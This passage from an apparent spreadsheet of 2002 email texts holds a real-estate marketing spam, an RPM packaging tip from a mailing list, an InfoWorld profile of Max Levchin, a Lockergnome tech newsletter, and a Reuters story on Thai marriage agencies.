 up by an upstream spam filter.
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Home for Sale? 
 List with us! &lt;http://www.clrea.com/whyusseller.cfm&gt; 
 Buying a home is an important step in your life and quite possibly the
 largest purchase you will ever make. A trustworthy and reliable agent is
 what you're looking for but often times it can be difficult to find a
 real estate agent deserving of your trust.
 Through recommendations and client evaluations we've assembled a
 national association of Christian Real Estate Agents
 &lt;http://www.clrea.com/philosophy.cfm&gt;  dedicated to fair business
 practices and the teachings of our savior.
 Christian Agents, Lenders, Appraisers and Inspectors: Click Here
 &lt;http://www.clrea.com/assbenefits.cfm&gt;  to learn more about joining our
 family of Christian Real Estate Professionals
 Follow these easy steps &lt;http://www.clrea.com/howworkbuyers.cfm&gt;  and
 we'll take care of the rest...
 1. Describe the property you are looking using our Buyer's Information
 Form &lt;http://www.clrea.com/buyersform.cfm&gt; .
 2. Our Christian Living Real Estate Associate Agent contacts you at your
 convenience to get a better understanding of your specific real estate
 needs.
 3. Our Christian Living Real Estate Associate Agent suggests properties
 that fit your criteria and arranges for you to view the properties that
 interest you.
 4. During the decision making process, our Associate Christian Agent
 provides reliable and honest guidance to get you the best possible deal.
 5. When you've decided on a property to purchase, our agent makes all
 the necessary preparations to ensure a trouble free transaction.
  &lt;http://clrea.com&gt; 
 To be removed from this list click here
 &lt;http://www.clrea.com/market/autooptout.cfm?address=fork@xent.com&amp;campai
 gn=52&gt;  
 ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;for home buyers&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;&lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  =
 Created Thu May 16 19:54:49 GMT-0700 (Pacific Daylight Time) 2002--&gt;
 &lt;STYLE type=3Dtext/css&gt;&lt;/STYLE&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial color=3D#0000ff size=3D2&gt;&lt;/FONT&gt; &lt;/DIV&gt;
 &lt;BLOCKQUOTE&gt;
   &lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=3D500 align=3Dcenter =
 border=3D1&gt;
     &lt;TBODY&gt;
     &lt;TR&gt;
       &lt;TD vAlign=3Dcenter&gt;
         &lt;DIV align=3Dcenter&gt;
         &lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D500 =
 align=3Dcenter border=3D0&gt;&lt;!-- fwtable fwsrc=3D"rebuyers.png" =
 fwbase=3D"mailer2.gif" fwstyle=3D"Dreamweaver" fwdocid =3D "742308039" =
 fwnested=3D"1" --&gt;
           &lt;TBODY&gt;
           &lt;TR&gt;
             &lt;TD colSpan=3D2&gt;&lt;IMG height=3D124=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r1_c1.gif"=20
               width=3D500 border=3D0 name=3Dmailer2_r1_c1 =
 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
           &lt;TR&gt;
             &lt;TD vAlign=3Dtop&gt;
               &lt;P align=3Dleft&gt;&lt;IMG height=3D626=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/mailer2_r2_c1.gif"=20
               width=3D174 useMap=3D#mailer2_r2_c1Map border=3D0 =
 name=3Dmailer2_r2_c1=20
               NOSEND=3D"1"&gt;&lt;/P&gt;
               &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial, Helvetica, =
 sans-serif"=20
               size=3D2&gt;&lt;B&gt;&lt;A =
 href=3D"http://www.clrea.com/whyusseller.cfm"&gt;&lt;FONT=20
               size=3D3&gt;Home for Sale? &lt;BR&gt;List with=20
             us!&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
             &lt;TD vAlign=3Dtop width=3D313 height=3D671&gt;
               &lt;P&gt;&lt;B&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;Buying a=20
               home is an important step in your life and quite possibly =
 the=20
               largest purchase you will ever make. A trustworthy and =
 reliable=20
               agent is what you're looking for but often times it can be =
               difficult to find a real estate agent deserving of your=20
               trust.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;Through=20
               recommendations and client evaluations we've assembled a =
 national=20
               association of &lt;A onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/philosophy.cfm"&gt;Christian =
 Real Estate=20
               Agents&lt;/A&gt; dedicated to fair business practices and the =
 teachings=20
               of our savior.&lt;/FONT&gt;&lt;/P&gt;
               &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Christian=20
                 Agents, Lenders, Appraisers and Inspectors: &lt;a =
 href=3D"http://www.clrea.com/assbenefits.cfm"&gt;Click=20
                 Here&lt;/a&gt; to learn more about joining our family of =
 Christian Real=20
                 Estate Professionals&lt;/font&gt;&lt;/p&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;Follow=20
               these &lt;A onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/howworkbuyers.cfm"&gt;easy =
 steps&lt;/A&gt; and=20
               we'll take care of the rest...&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Times New Roman, Times, serif" =
 size=3D3&gt;&lt;B&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" =
 color=3D#0000ff&gt;1&lt;/FONT&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;.&lt;/FONT&gt;&lt;/B&gt;&lt;FONT=20
               face=3D"Arial, Helvetica, sans-serif" size=3D2&gt; Describe =
 the property=20
               you are looking using our &lt;A =
 onfocus=3Dif(this.blur)this.blur()=20
               href=3D"http://www.clrea.com/buyersform.cfm"&gt;&lt;B&gt;Buyer's =
 Information=20
               Form&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;2&lt;/FONT&gt;.&lt;/B&gt; Our Christian =
 Living Real=20
               Estate Associate Agent contacts you at your convenience to =
 get a=20
               better understanding of your specific real estate=20
 needs.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;3&lt;/FONT&gt;.&lt;/B&gt; Our Christian =
 Living Real=20
               Estate Associate Agent suggests properties that fit your =
 criteria=20
               and arranges for you to view the properties that interest=20
               you.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;4&lt;/FONT&gt;.&lt;/B&gt; During the decision =
 making=20
               process, our Associate Christian Agent provides reliable =
 and=20
               honest guidance to get you the best possible =
 deal.&lt;/FONT&gt;&lt;/P&gt;
               &lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" =
 size=3D2&gt;&lt;B&gt;&lt;FONT=20
               color=3D#0000ff size=3D3&gt;5&lt;/FONT&gt;.&lt;/B&gt; When you've decided =
 on a=20
               property to purchase, our agent makes all the necessary=20
               preparations to ensure a trouble free =
 transaction.&lt;BR&gt;&lt;/FONT&gt;&lt;FONT=20
               face=3D"Times New Roman, Times, serif" size=3D3&gt;&lt;BR&gt;&lt;A=20
               onfocus=3Dif(this.blur)this.blur() =
 href=3D"http://clrea.com"&gt;&lt;IMG=20
               height=3D59=20
               =
 src=3D"http://www.clrea.com/emarketing/rebuyers/button.gif"=20
               width=3D310 border=3D0=20
         NOSEND=3D"1"&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT =
 face=3DVerdana=20
         color=3Dblack size=3D-2&gt;To be removed from this list &lt;A=20
         =
 href=3D"http://www.clrea.com/market/autooptout.cfm?address=3Dfork@xent.co=
 m&amp;campaign=3D52"&gt;click=20
         here&lt;/A&gt;&lt;/FONT&gt; =
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BLOCKQUOTE&gt;&lt;MAP=20
 name=3Dmailer2_r2_c1Map&gt;&lt;AREA onfocus=3Dif(this.blur)this.blur() =
 shape=3DRECT=20
   coords=3D13,456,159,505=20
 href=3D"http://www.clrea.com/whyusfinance.cfm?class=3D1"&gt;&lt;/MAP&gt;&lt;/BODY&gt;&lt;/H=
 TML&gt;
 ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IMF shores up debt defences
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381143,215/
 Date: 2002-09-30T03:05:00+01:00
 *Business:* City and Wall Street are sceptical of plan to prevent more 
 countries slipping into Argentina-style crisis
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Portable RPMs
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-08-16 at 20:58, Torsten Bronger wrote:
 &gt; If I create an RPM according to one of the how-to's with having
 &gt; Red Hat in mind, how big are my chances that it will also work
 &gt; for the SuSE distribution, or others?  (I don't know how many
 &gt; base on the RPM system.)
 &gt; 
 &gt; Or what must I pay attention to when creating an RPM that should
 &gt; work with the big distributions?
 One practice I've adopted is to list Requires: only when they're
 absolutely necessary.  This will help because some packages are named
 differently between distributions (eg. SDL &lt;-&gt; libSDL), and the
 dependencies are automatically handled by RPM by depending on shared
 library names.
 This doesn't apply to BuildRequires: though.
 Use macros for directory names where available, eg %{_libdir},
 %{_bindir}, %{_datadir} etc.
 I'd like to suggest using as many RPM macros for command names as
 possible too, but unfortunately I don't know of a definitive reference
 about them...
 I have a small RedHat 7.3 RPM/apt repository at
 &lt;http://cachalot.ods.org/&gt;, and I've received reports from people
 running Mandrake 8.x and SuSE that the RPMs work with them out of the
 box.
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: InfoWorld profile of Max Levchin
</t>
  </si>
  <si>
    <t xml:space="preserve">Congrats, in the end...
 &gt; "If they didn't have Max, they might have succumbed, because PayPal was 
 &gt; susceptible to fraud and money laundering, and Max tightened them up,"
 http://www.infoworld.com/articles/ct/xml/02/09/02/020902ctspotlight.xml
 Secure and at ease
 ByJack Mccarthy
 August 30, 2002 1:01 pm PT
 MAX LEVCHIN'S FASCINATION with encryption started when he was a teenager 
 in Kiev, Ukraine, and continued as he immigrated to the United States 
 where he attended the University of Illinois at Urbana-Champaign. In 
 late 1998, not two years out of college, he drew on his passion to 
 co-found PayPal, the online payment system that has since attracted tens 
 of millions of users and gained the reputation as the premier Internet 
 transaction processor. Now online auction house eBay has acquired his 
 company for a king's ransom.
 Not bad for a 27-year-old kid from Ukraine.
 A programmer since he was 10 years old, Levchin and his family moved to 
 Chicago in 1991, and since then he has pursued security as if on a 
 mission. He created a startup right out of college to build secure 
 passwords for Palm Pilots. He met Peter Thiel, and the two founded 
 PayPal to target online payment security. Thiel is now CEO of the 
 company.
 "This company was founded on the notion of security value," Levchin 
 says. "Peter Thiel and I shared that vision from the very beginning."
 Thiel concentrates on company business matters, whereas Levchin remains 
 focused on security, which he says is the key to the company's good 
 fortune.
 "I explain [PayPal] as a security company posing as a transaction 
 processor," Levchin says. "We spend a lot of time designing security so 
 it doesn't step on the toes of convenience and not the other way around. 
 The trade-off is fundamental."
 Mountain View, Calif.-based PayPal allows businesses and consumers with 
 e-mail addresses to send and receive payments via the Internet, 
 accepting credit card or bank account payments for purchases. The 
 service extends to 38 countries, with more than 17 million users and 
 more than 3 million business accounts.
 Most of PayPal's users are participants in online auctions, which led 
 PayPal to be closely linked with eBay, the leading Web auction site. 
 Although they were once rivals, the relationship between the two 
 companies resulted July 8 in eBay's tentative $1.5 billion acquisition 
 of PayPal. The agreement is subject to regulatory review.
 Levchin says he will stay at PayPal as it merges with eBay. "There are 
 areas of synergy and collaboration we can explore."
 Although security is a dominant feature for PayPal, the company's 
 ability to carry out open communications among the millions of 
 participants fits the growing Web services model, Levchin says.
 "This is a service that links people and allows them to send messages to 
 one another," he says. Levchin is a panelist at InfoWorld's 
 Next-Generation Web Services II conference Sept. 20
 PayPal, as an online payment system, is a natural target for fraud. And 
 Levchin has almost singlehandedly saved the company from thieves bent on 
 exploiting the system, says Avivah Litan, a vice president and analyst 
 covering financial services at Stamford, Conn.-based Gartner.
 "If they didn't have Max, they might have succumbed, because PayPal was 
 susceptible to fraud and money laundering, and Max tightened them up," 
 Litan says.
 To combat criminals, Levchin established "Igor," an antifraud program 
 that monitors transactions and warns of suspicious accounts. Levchin 
 says building security and antifraud systems is a job he relishes. "The 
 work I do is important to PayPal and to consumers in general because the 
 work makes Internet shopping safe. It's the view that ecommerce has 
 arrived."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Deeper Uplink
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020715.html"&gt;
       http://www.lockergnome.com/issues/daily/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.15.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 It's official: Gretchen, Sprocket, and I will be moving in a few
 weeks. Not too far, though. We'll be going deeper into the city of
 San Francisco starting on the first of September. Lori and Norm
 were here over the weekend (for a photo shoot); in between sets,
 Gretchen invited them to join her hunt. They came upon a house
 located in one of the busier parts of town. With only street
 parking available, I wasn't too thrilled about investigating the
 property. However, my wife seemed optimistic. We kinda knew what
 we were looking for in a residence (and its neighborhood), but
 also knew we'd have to make certain concessions in the process. We
 parked (literally) up the hill and found our way to what would
 turn out to be our future home (at least, for the next year or
 so). It has lots of usable space - which is a premium here. Plus,
 the landlords are extremely dog-friendly. Winner! The pictures and
 videos will come, never fear.
 &lt;p&gt;
 &lt;table align="left"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size="1"&gt;&lt;B&gt;PC World Picks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,4172,00.asp"&gt;WinZip v8.1&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5648,00.asp"&gt;IrfanView v3.70&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2049,00.asp"&gt;ACDSee v4.0.2&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,3335,00.asp"&gt;Microangelo v5.5&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2015,00.asp"&gt;SmartDraw&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5556,00.asp"&gt;Winamp v2.80&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2432,00.asp"&gt;Paint Shop Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2920,00.asp"&gt;Cool Edit 2000&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7996,00.asp"&gt;UltraEdit v9.00a&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,6570,00.asp"&gt;Backup Plus v6.1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2051,00.asp"&gt;TextPad v4.5&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,20521,00.asp"&gt;Mailbag Asst v2.6c&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,4780,00.asp"&gt;Time and Chaos v5.4.0&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,15740,00.asp"&gt;SureThing Labeler&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7573,00.asp"&gt;WinRAR v3.00&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7777,00.asp"&gt;Blaze Media Pro&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 First order of business: get broadband! According to AT&amp;T's Web
 site, cable modem service is not available in the area. However,
 DSL is an option. So, it looks like I'm going to be purchasing an
 external &lt;A HREF="http://lockergnome.pricegrabber.com/search_gen.php?form_keyword=dsl%20modem"&gt;DSL
 modem&lt;/A&gt; in a few days. Any suggestions?
 Yeah, I'm not even sure who I'll select for my provider. They
 currently use SBC to get online, so I might just stick with them
 for continuity's sake. Verizon has been solid enough for me here,
 but I believe our loft complex has a unique infrastructure. If I
 could make contact with someone from any capable system, I'd
 probably go with them. I should probably get the ball rolling
 soon, though - I'd hate to play the waiting game for too long.
 I've heard of installation nightmares, so I'll probably be rolling
 my own (again). 56k is quaint, but hardly enough pipe to get any
 real work done. When you download as much as I do, every bit
 counts. Oh, and did I tell you about the bites?
 &lt;p&gt;
 There are plenty of unique restaurants in just about every
 direction. Plus, we're right up around the corner from a Peet's
 outlet! If you need me, you know where you can find me. I'll
 probably also be setting up a Wi-Fi network before too long, too.
 My Proxim hardware still works, but I wasn't sure if I needed a
 crossover cable to connect it to my router. Furo tells me: "If the
 hub has an uplink port, then a straight cable should work between
 the two, as it provides the crossover for you. If both have uplink
 and non-uplink ports (workstation attachment ports), then you
 would need a crossover cable between like ports. For instance, if
 you were connecting a workstation port on one to a workstation
 port on another, you'd have to use a crossover. Same for uplink to
 uplink." How's that for home network helpfulness? Oh, if only he'd
 do a free &lt;a href="http://www.gnometomes.com/"&gt;Gnometome&lt;/a&gt; for
 us...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&lt;b&gt;Traces Viewer v1.0 [478k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.surfpilot.net/tracesviewer.html"&gt;http://www.surfpilot.net/tracesviewer.html&lt;/a&gt;
 &lt;p&gt;
 {Find Web site remnants} Who knows what evils lurk on the hard
 drives of mine? I'm always curious about what has been downloaded
 to my PC after I have visited a website. I suppose I COULD clear
 out my Temporary Internet Files before going to every single
 page... or I could just install Traces Viewer. This handy
 application gives me the power to see what my PC acquires for
 every website I visit. With Traces Viewer's easy-to-read
 interface, I can see what files come from each site, and also if
 the site contained any cookies.  Mmmmmm, cookies... now, how could
 chocolate chip be evil?
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Pixel Toolbox v1.1 [3.7M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.axiomx.com/PixelToolbox/"&gt;http://www.axiomx.com/PixelToolbox/&lt;/a&gt;
 &lt;p&gt;
 {Make your own icons} I have a compulsive habit of changing the
 original desktop and icons in Windows to a version that mirrors my
 personality. So what happens if I can't find a desktop or set of
 icons that suits me? I load up Pixel Toolbox! This program allows
 me to flex my creative skills by creating Windows icons and
 pointers. Find yourself in a creativity slump? Well, you don't
 have to strain your creative muscle. PixelToolbox allows you to
 import an image that you already own, and work from there. If that
 isn't enough, you can fashion your own tiled desktop or share your
 creation with friends by exporting your masterpiece as a .jpg,
 .png, .tga, or .tif file.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&lt;b&gt;Software Audit Protection Program [2.9M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.alliedhr.com/sapp.htm"&gt;http://www.alliedhr.com/sapp.htm&lt;/a&gt;
 &lt;p&gt;
 You NEVER pirate software, right? OF COURSE YOU DON'T! (Good
 answer.) So, if someone came to your door and accused you of
 software piracy, could you prove them wrong? With the Software
 Audit Protection Program (SAPP), you could. You can track every
 piece of software you own with this application; you can attach an
 image of your paper receipt, add information like serial numbers
 and activation keys, etc., so you will never be left hunting for
 these items in the future. SAPP can even create and print reports
 detailing your inventory. If you own a small company and want to
 make confirm that you and your employees are "Software Compliant,"
 this is the program for you. You can track your software using
 many different variables such as License, User ID, Software Title
 or Activation Key. Don't get caught second-guessing... be certain
 with the Software Audit Protection Program!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&lt;b&gt;Print! v1.6 [319k] W9x/2k/XP US$39&lt;/b&gt;&lt;br&gt;
     Unearthed by Rob Muller
 &lt;p&gt;
 &lt;a class="URL" href="http://www.robsoftware.com/"&gt;http://www.robsoftware.com/&lt;/a&gt;
 &lt;p&gt;
 {Screen print utility} Time is money, and I endorse any program
 that can save me time. Luckily, that is exactly what Print! v1.6
 does. Say that I want to share screenshots with my other tech
 friends to compare error messages and talk about possible fixes:
 every time I take a screen shot, I open up Word, paste the
 snapshot, and THEN I can print it. Too many steps, too much of my
 time! With Print!, I just hit my "Print Screen" key and out comes
 my screenshot without involving any other programs. Don't want a
 screenshot of your whole desktop? Not a problem, just press Alt +
 Print Screen and you'll have a printout of the active window only.
 Print! 1.6 goes so far as to put the date and time on your
 printout too... perfect for saving those high scores on solitaire!
 Other features include scaling, centering, and the ability to
 invert images. (So, not only will you save time, you'll also save
 on toner. Bonus!)  You may also want to note that Print! saves
 your printer configuration without wreaking havoc on the settings
 in your other programs. You'll definitely get your money's worth
 with this program. Don't believe me? Start by checking out the
 evaluation version for yourself!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border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;REMOTE ACCESS TO YOUR E-MAIL&lt;/b&gt;: LoudPC is a new product from Loudfire enabling direct access to your PC's Outlook(tm) from any Internet browser or web phone. Use LoudPC to access your work email from home, check your next appointment while at lunch, reply to an important email while in a meeting, etc. No synchronization required. Works with your existing email accounts. Accesses all of your folders. All changes reflected immediately in your Outlook(tm). &lt;a href="http://www.qksrv.net/click-471546-7064313"&gt;Get more info on LoudPC&lt;/a&gt; &lt;img src="http://www.qksrv.net/image-471546-7064313" width="1" height="1" border="0"&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;BookCrossing Bookclub&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://bookcrossing.com/"&gt;http://bookcrossing.com/&lt;/a&gt;
 &lt;p&gt;
 Gretchen is a self-professed pack rat: there are just some things
 that she can't throw away. For example, books. I, on the other
 hand, prefer my text in an electronic medium, and don't really
 miss those analog versions. (What's that stuff called again?
 Paper?) Many of my books are gathering dust on the bookshelf. The
 alternative? Free them into the wild! BookCrossing is essentially
 a worldwide book club. You register online and get a BookCrossing
 ID number to put on your books with a note sending the new reader
 back to BookCrossing (think of wheresgeorge.com). Then you just
 leave the book "in the wild" to be found by someone else; the
 folks at BookCrossing suggest a park bench, the pocket of an
 airplane seat, or just plain giving your book to a friend. "Sounds
 easy, right? Well it is. It's also a fascinating exercise in fate,
 karma, or whatever you want to call the chain of events that can
 occur between two or more lives and one piece of literature. Oh,
 and we should mention, it's absolutely free and absolutely
 private, too." BookCrossing also offers book reviews, ratings, and
 recommendations.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Any modem that relies on Windows to function is dubbed a
 "Winmodem." Most manufacturers use "Winmodems" because they are
 cheap and easy to set up on a standard model PC. I don't have any
 problem with the manufacturer saving money (because living in a
 capitalistic society, I would hope that the savings would trickle
 down to ME in one way or another). I do, however, have a problem
 with the way "Winmodems" function after you add more internal
 devices to your PC. "Winmodems" rely on Windows to mediate their
 serial communication (I/O address, COM port, IRQ, etc.) and as you
 can imagine, the more devices Windows has to manage, the higher
 the probability of running into a problem. And what if you want to
 run Linux instead? Will the "Winmodem" function well, if at all,
 in an operating system other than Windows? Don't bet on it! If you
 want to make sure you don't have any problems after upgrading your
 system, you'll want to get yourself a hardware modem. How can you
 determine this? Checking a modem's system requirements. If the
 modem says it REQUIRES Windows, then keep looking... you've found
 yourself a "Winmodem." However, if the system requirements for the
 modem say that it will work with Linux, then you've found yourself
 a hardware modem. Yes, it IS that easy.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href="http://www.lockergnome.com/issues/daily/20020715.html"&gt;http://www.lockergnome.com/issues/daily/20020715.html&lt;/a&gt;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Deeper Uplink --&gt;
 Toys are made in heaven, batteries are made in hell.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Urgent Business
</t>
  </si>
  <si>
    <t xml:space="preserve">--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">...an alternative to the "kind of de-feminized, over-sized, self-centered,
 mercenary-minded lady available on the British singles scene,"
 Glad to see American culture is making it's way into the British bars too :)
 God bless us uncivilized bastards, every one.
 Still, definately something not right about the below. People are now
 cheaper then a decent laptop? (ok, so we knew that already)
 -------------
 Selling Wedded Bliss Big Business in Thailand
 Thu Aug 29,10:19 AM ET
 By Andrew Marshall
 BANGKOK, Thailand (Reuters) - English dentist Ken Moylan came to Thailand
 looking for a wife. It took two hours to find her.
 "The first day I went out with Wan, she came back to my hotel and hung all
 my clothes up and tidied the room. I thought it was marvelous," he said. "I
 knew then there was something special."
 Moylan, 49, is one of thousands of men who use introduction agencies to meet
 -- and marry -- Thai women. He lives in England now with 28-year-old Wan,
 who is expecting their first child.
 Critics of marriage agencies say they exploit the grinding poverty of women
 in developing countries, offering dreams of a new life in the West that
 often turn sour. But Moylan says he has no regrets about coming to Thailand
 in search of a wife.
 "I got to Thailand at 2 p.m., and by 4 p.m. I'd met Wan," he said. "I knew I
 found her attractive. I could tell straight away that she was very caring."
 Moylan spent a week in Thailand, and after returning to England kept in
 touch with Wan by phone and mail. Six months later she came to England and
 the couple married.
 MR. MARRIAGE
 Lawrence Lynch, 49, runs Thai Professional Introduction Services, the agency
 Moylan used to meet his wife. Lynch, who calls himself "Mr. Marriage,"
 started the company after also marrying a Thai woman through an introduction
 agency.
 Since then he has helped set up hundreds of marriages.
 "In the last five years we've done about 400," he said. "To the best of my
 knowledge, they have all been successful."
 Male clients pay $2,213 for the service, although men from countries that
 require them to handle some of the visa work on their own get a discount.
